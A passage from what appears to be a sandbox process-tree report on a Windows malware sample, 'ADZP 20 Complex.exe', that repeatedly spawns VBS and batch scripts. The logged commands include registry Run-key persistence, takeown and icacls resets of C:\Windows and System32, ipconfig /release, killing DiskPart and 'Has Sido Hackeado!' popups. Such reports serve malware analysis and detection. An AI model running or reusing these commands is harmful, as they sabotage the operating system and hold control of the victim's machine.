C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\81DD.tmp\81DE.tmp\81DF.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\926E.tmp\926F.tmp\927F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f11⤵
- Kills process with taskkill
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C219.tmp\C21A.tmp\C21B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f11⤵
- Kills process with taskkill
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
-
C:\Windows\explorer.exeexplorer.exe7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B1A7.tmp\B1A8.tmp\B1A9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Modifies registry class
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\12AE.tmp\12AF.tmp\12B0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3922.tmp\3923.tmp\3924.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"11⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
-
C:\Windows\explorer.exeexplorer.exe7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\notepad.exenotepad5⤵
-
C:\Windows\system32\calc.execalc5⤵
- Modifies registry class
-
C:\Windows\system32\notepad.exenotepad5⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3B44.tmp\3B45.tmp\3B46.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r8⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7896.tmp\7897.tmp\7898.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\659C.tmp\659D.tmp\659E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8EEE.tmp\8EEF.tmp\8EF0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
-
C:\Windows\explorer.exeexplorer.exe7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A86.tmp\9A87.tmp\9A88.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
